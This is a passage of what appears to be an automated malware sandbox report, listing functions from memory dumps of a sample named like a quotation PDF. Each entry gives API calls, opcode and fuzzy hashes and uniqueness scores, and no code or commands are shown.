                                                        • Opcode ID: 63c2432e4f9ef85b5bdd8c64faf3b51a208b7f64a1b48666fcf54472b79717aa
                                                        • Instruction ID: d67d3f05b91b07ce75d463084232405674644b2631dfec67e3136761ef328a3b
                                                        • Opcode Fuzzy Hash: 63c2432e4f9ef85b5bdd8c64faf3b51a208b7f64a1b48666fcf54472b79717aa
                                                        • Instruction Fuzzy Hash: B41114B6D002499FCB10CF9AD444ADEFBF4EB88324F05842AD819AB300C774A545CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06454610 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 06454676
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516563121.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6450000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 41fb80533e75b2908cd58da72a04bb2e298c8a8d59b59ef60f0322bdadcf62a0
                                                        • Instruction ID: eac3be2562fc965c41f08839fac5a3b310298e0f8acc35555087fabf9925106e
                                                        • Opcode Fuzzy Hash: 41fb80533e75b2908cd58da72a04bb2e298c8a8d59b59ef60f0322bdadcf62a0
                                                        • Instruction Fuzzy Hash: 4A11FDB1C003498FCB10CF9AC844BDEFBF4AB88324F15842AD829AB600D378A545CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06459D68 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OleInitialize.OLE32(00000000), ref: 0645AC15
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516563121.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6450000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: Initialize
                                                        • String ID:
                                                        • API String ID: 2538663250-0
                                                        • Opcode ID: de25e177f2c74fd7768a83dae91b7eebb216c19be055c2515c2ce982f116d10e
                                                        • Instruction ID: 6e5301280ac270cc4c9654ecbd92912173c4c60d2448127b4926109135dc4347
                                                        • Opcode Fuzzy Hash: de25e177f2c74fd7768a83dae91b7eebb216c19be055c2515c2ce982f116d10e
                                                        • Instruction Fuzzy Hash: 621133B09042488FCB10DF99C548BDEFBF4EB48224F14855AD919B7300D774A984CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0645ABB8 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OleInitialize.OLE32(00000000), ref: 0645AC15
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516563121.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6450000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: Initialize
                                                        • String ID:
                                                        • API String ID: 2538663250-0
                                                        • Opcode ID: 813f2b7211a21841b71b3395f230945fbd2a15ea1982fe8abff6ce1ee4e55b5d
                                                        • Instruction ID: 673e3d234f2ddd6d3d022353e3805f9b65936e28511e4b6c9796c4eff3d81c1b
                                                        • Opcode Fuzzy Hash: 813f2b7211a21841b71b3395f230945fbd2a15ea1982fe8abff6ce1ee4e55b5d
                                                        • Instruction Fuzzy Hash: 6C1145B19003488FCB10CFAAD448BCEFBF4EB48324F14865AD529A7340D774A984CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 012ADA01 Relevance: 1.3, Instructions: 1340COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.512774080.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_12ad000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3afb359906e5fe06237708ef47d07430160b823e5c183de219850706f2f25aec
                                                        • Instruction ID: 9b9829681ad69dac7a835883cfbeb7baa5510914d7c6156e99744ff52910ef06
                                                        • Opcode Fuzzy Hash: 3afb359906e5fe06237708ef47d07430160b823e5c183de219850706f2f25aec
                                                        • Instruction Fuzzy Hash: 8252286205E3C2AFD3034BA4CD616927FB0AF47224B5F45D7D0C0DA6A3D25D8C9AC762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 012AE16A Relevance: .3, Instructions: 335COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.512774080.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_12ad000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d960df19001c25d924a31e89afec29602f48fc7178ad5f01a73d20f8334bc50d
                                                        • Instruction ID: e9ea417f8e2e0065c957354a2051f66c25a073e340085930b41d5bb7e0450aa4
                                                        • Opcode Fuzzy Hash: d960df19001c25d924a31e89afec29602f48fc7178ad5f01a73d20f8334bc50d
                                                        • Instruction Fuzzy Hash: 0A812D7605A7C1AFD3038B60DC61B917FB0EF47325F1A85E7D084CB6A3D269885AC762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0129D124 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.512734272.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_129d000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5c1240666f776e098ea477ced8b6e4a88ccac012b488bcc77b613157d086df16
                                                        • Instruction ID: c9a35ccfc0480bcc54af23e5b3f8a79b317df2d5ee93cc7f0deb78c0531b00c2
                                                        • Opcode Fuzzy Hash: 5c1240666f776e098ea477ced8b6e4a88ccac012b488bcc77b613157d086df16
                                                        • Instruction Fuzzy Hash: F62125F6514248EFDF11DF98D9C0B2ABF65FB84324F248669EA054B20AC336D846D7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0129D4D8 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.512734272.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_129d000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b5f39013b24550d824844053204c6a64f474deda995a50ae11a6730cfb6fd783
                                                        • Instruction ID: 657163db650f83caa00ed2d9de5becedc87f9ca5d9cf1a2d7fd48b36fb0c9854
                                                        • Opcode Fuzzy Hash: b5f39013b24550d824844053204c6a64f474deda995a50ae11a6730cfb6fd783
                                                        • Instruction Fuzzy Hash: 9C217CB1514248DFCF11DF98E9C0B2ABF65FB88328F24856DEA054B206C336D845D7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 012AE3DC Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.512774080.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_12ad000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bb420f51d0ef62fb4489320e3b666aa3ca967cc9f86075ed6f44ef07fa298c8d
                                                        • Instruction ID: c5e0ec2cfde54c493a871b4c0e219e8fd1c13ab915bee78f659885fcce944dff
                                                        • Opcode Fuzzy Hash: bb420f51d0ef62fb4489320e3b666aa3ca967cc9f86075ed6f44ef07fa298c8d
                                                        • Instruction Fuzzy Hash: 132149B5514240EFDB01DF14D8C0B26BB69FB84324F24C56DEA094B346C37AD847CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0129D11F Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.512734272.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_129d000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8760001a56973c006fccc1098cf6934b5270701d3d0f935ddaf206bc60356589
                                                        • Instruction ID: 8f2cee87cd0230bfe01eac8eb08ef60f904be59903256bd6ae226a56d2f4dcc2
                                                        • Opcode Fuzzy Hash: 8760001a56973c006fccc1098cf6934b5270701d3d0f935ddaf206bc60356589
                                                        • Instruction Fuzzy Hash: 1F11AFB6504284DFCF12CF58D9C4B56BF71FB84324F2486A9D9050B617C336D45ADBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0129D4D3 Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.512734272.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_129d000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8760001a56973c006fccc1098cf6934b5270701d3d0f935ddaf206bc60356589
                                                        • Instruction ID: 822a335ccaea79d7d7bf48f7239697d06496f1e18e353e3d4989379d0ddc671a
                                                        • Opcode Fuzzy Hash: 8760001a56973c006fccc1098cf6934b5270701d3d0f935ddaf206bc60356589
                                                        • Instruction Fuzzy Hash: 7111AF76504284DFCF12CF58E9C4B16BF71FB84324F2486A9D9050B616C33AD45ADBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%